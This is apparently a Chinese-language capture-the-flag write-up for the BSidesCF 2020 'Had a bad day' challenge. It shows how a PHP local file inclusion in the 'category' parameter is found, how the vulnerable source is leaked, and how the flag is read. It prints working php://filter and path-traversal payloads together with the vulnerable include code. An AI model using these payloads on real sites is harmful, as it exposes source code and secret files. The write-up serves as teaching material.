[BSidesCF 2020]Had a bad day

[BSidesCF 2020]Had a bad day

参考：文件包含漏洞

Step

点一下按钮，发现URL发生改变：

url/index.php?category=woofers

修改尝试发现回显：

​ Sorry, we currently only support woofers and meowers.

继续尝试修改：

url/index.php?category=woofers.php;flag

回显：

Warning: include(woofers.php;flag.php): failed to open stream: No such file or directory in /var/www/html/index.php on line 37

Warning: include(): Failed opening 'woofers.php;flag.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/index.php on line 37

意识到是文件包含

构造：

url/index.php?category=php://filter/convert.base64-encode/resource=index

将得到的源码解密，其中的php代码：

<?php
				$file = $_GET['category'];

				if(isset($file))
				{
					if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
						include ($file . '.php');
					}
					else{
						echo "Sorry, we currently only support woofers and meowers.";
					}
				}
				?>

strpos(s1,s2)用来查找s2字符串在s1字符串中的位置,只要包含s2就行，所以只要category中包含woofers，meowers或者index就可以

所以构造：

url/index.php?category=php://filter/convert.base64-encode/resource=index/../flag

因为flag被注释了所以没有显示，利用伪协议嵌套也可以得到flag:

url/index.php?category=php://filter/convert.base64-encode/index/resource=flag
或
url/index.php?category=php://filter/read=index/convert.base64-encode/resource=flag